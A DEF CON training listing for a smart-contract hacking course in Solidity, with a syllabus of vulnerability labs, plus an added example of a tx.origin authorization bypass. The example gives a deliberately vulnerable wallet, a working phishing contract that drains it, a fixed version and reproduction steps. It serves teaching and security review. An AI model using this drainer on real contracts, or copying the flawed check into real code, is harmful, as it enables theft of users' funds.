    DEF CON Training

    Davide Cioccia - Hackable.sol: Smart Contract Hacking in Solidity $1,500

    Trainer(s) bio:

    Davide Cioccia is the founder of dcodx, a cybersecurity firm focusing on bridging the gap between development and security, working together with development teams to create and promote the DevSecOps security culture.

    He is one of the first contributors to the OWASP Mobile Security Testing Guide, a member of the SANS advisory board and Chapter Lead of DevSecCon Netherlands. He is also a speaker at international security conferences such as Black Hat, OWASP AppSec, DevSecCon, Hacktivity and regional OWASP events, where he has presented approaches and tools to automate mobile security testing in CI/CD, detect and prevent phishing attacks, and automate infrastructure security in the release cycle.

    On the personal side he loves to play racket sports, from tennis to padel, from ping pong to beach tennis. So hit him up for a match if you are in the Netherlands.

    Some links:

    https://www.devseccon.com/chapters/dsc-netherlands/
    https://appsecus2018.sched.com/event/F02G/mobile-bdd-security-tests-on-steroids-a-new-framework-to-automate-mstg-and-masvs-in-your-cicd-pipeline
    https://www.blackhat.com/eu-18/arsenal/schedule/presenters.html#davide-cioccia-36753

    Trainer(s) social media links:

    https://www.linkedin.com/in/davidecioccia/
    https://twitter.com/davide107


    Training description:

    A two-day, fully hands-on training in which you will learn how to identify vulnerabilities in smart contracts written in Solidity. During the course we will work through 12 labs inspired by the major hacks that cost companies millions of dollars: you will implement smart contracts, perform security reviews, and detect security flaws using both manual analysis and automated tools.

    The list below contains some of the scenarios we will go through and the vulnerabilities we will identify and fix in the labs:

    • Any user can cash out the money from the smart contract
    • Users can buy the subscription with any wei amount
    • Any user can check the amount of money stored in the contract address
    • Reentrancy vulnerability
    • Block Timestamp Manipulation Vulnerability
    • Tx.origin: Authorization bypass
    • Integer Overflow and Underflow
    • BatchTransfer Overflow (CVE-2018-10299)
    • Unprotected SELFDESTRUCT
    • DelegateCall vulnerabilities
    • ....more


    Outline:

    Intro to Ethereum and smart contracts
      - Course introduction
      - Bitcoin vs Ethereum
      - ETH history: the four stages of development
      - PoW vs PoS
      - Sharding and the Beacon Chain
      - Docking

    Smart Contracts part 1
      - Smart contract basics
      - Ethereum smart contracts and Solidity
      - EVM
      - Accounts, transactions and gas
      - Storage, memory and stack
      - VSCode and Remix IDE
      - LAB: Function visibility in Solidity
      - LAB: Our first smart contract

    Smart Contracts part 2
      - Types, enums and events
      - Mappings
      - Inheritance
      - Modifiers
      - SWC registry: the Smart Contract Weakness Classification, the CWE of smart contracts
      - Reentrancy vulnerability: the DAO hack
      - LAB: Steal all my money (reentrancy attack)
      - The OpenZeppelin ReentrancyGuard smart contract
      - Interfaces
      - LAB: Block timestamp manipulation vulnerability

    Authorization
      - Authorization in smart contracts
      - The OpenZeppelin authorization contracts
      - LAB: Authorization done properly
      - LAB: tx.origin: authorization bypass

    DoS
      - SELFDESTRUCT
      - DoS with block gas limit
      - DoS with failed call

    More vulnerabilities
      - Integer overflow and underflow
      - LAB: Integer overflow exploitation to drain smart contracts
      - LAB: BatchTransfer overflow (CVE-2018-10299)

    Libraries
      - Introduction to embedded and linked libraries
      - LAB: delegatecall vs call
      - LAB: Exploiting proxy contracts and delegate calls

    Security auditing
      - Manual vs automated audit
      - Introduction to smart contract reverse engineering
      - LAB: Tools: Mythril
      - LAB: Tools: Slither
      - How to build a comprehensive security auditing report

    Hack them all
      - Final smart contract hacking challenge
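    As an added illustration of the tx.origin authorization bypass covered in the Authorization block (example code written for this page, not lab material from the course or from dcodx): tx.origin is the externally owned account that signed the transaction, while msg.sender is the immediate caller. A wallet that authorizes on tx.origin can be emptied by any contract the owner is lured into calling, because the nested call still carries the owner as tx.origin. Contract and function names are assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

// Vulnerable: ownership is checked against tx.origin, the EOA that signed the
// transaction, rather than against msg.sender, the direct caller.
contract TxOriginWallet {
    address public owner;

    constructor() {
        owner = msg.sender;
    }

    receive() external payable {}

    function transferTo(address payable to, uint256 amount) external {
        require(tx.origin == owner, "not owner"); // BUG: passes for relayed calls
        to.transfer(amount);
    }
}

// Phishing contract (hypothetical): if the wallet owner can be tricked into
// sending any transaction to claimAirdrop(), the nested call into the wallet
// still observes tx.origin == owner and the check is satisfied.
contract Phisher {
    TxOriginWallet private immutable wallet;
    address payable private immutable attacker;

    constructor(address payable walletAddress) {
        wallet = TxOriginWallet(walletAddress);
        attacker = payable(msg.sender);
    }

    function claimAirdrop() external {
        // msg.sender here is the victim; inside the wallet, tx.origin is also the victim
        wallet.transferTo(attacker, address(wallet).balance);
    }
}

// Fixed: authorize on msg.sender. When the call is relayed through Phisher,
// msg.sender is address(Phisher), which is not the owner, so it reverts.
contract SafeWallet {
    address public owner;

    constructor() {
        owner = msg.sender;
    }

    receive() external payable {}

    function transferTo(address payable to, uint256 amount) external {
        require(msg.sender == owner, "not owner");
        to.transfer(amount);
    }
}
```

    To reproduce in Remix: deploy TxOriginWallet from account A and send it some ether, deploy Phisher from account B with the wallet's address, then call claimAirdrop() from account A; the wallet balance moves to B. Repeating the exercise with SafeWallet reverts with "not owner". A side effect of the fix is that the owner can no longer operate the wallet through a contract of their own (a multisig, for example) unless that contract is made the owner, which is the trade-off the course's OpenZeppelin authorization contracts handle explicitly.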

    Technical difficulty:

    The course is aimed at beginner to intermediate students who have some knowledge of smart contracts.

    Knowledge of the topics below is recommended but not mandatory:
      - Blockchain
      - Smart contracts and the Remix IDE
      - Basic understanding of decentralized applications and where they apply


    Suggested Prerequisites:

    The course starts from the basics of the blockchain and smart contracts.
    Useful resources:

      - https://docs.soliditylang.org/en/v0.8.13/
      - https://ethereum.org/


    Student provided items:

    - Laptop with at least 8 GB RAM
    - Chrome browser


    DATE: August 14th-15th 2023
    TIME: 8am to 5pm PDT
    VENUE: Caesars Forum, Las Vegas, NV
    TRAINER: Davide Cioccia

    - 16 hours of training with a certificate of completion.

    - 2 coffee breaks are provided per day
    - Note: Food is not included


    Registration terms and conditions:

    Trainings are refundable before July 1st, 2023; a $250 processing fee applies.

    Trainings are non-refundable after July 10th, 2023.

    Training tickets may be transferred. Please email us for specifics.

    Failure to attend the Training without prior written notification will be considered a No-Show, and no refund will be given.

    By purchasing this ticket you agree to abide by the DCT Code of Conduct and the registration terms and conditions listed above.

    DEF CON Communications, Inc.

    1100 Bellevue way NE

    8A-85

    Bellevue, WA 98004

    Copyright © 2023 defcontrainings.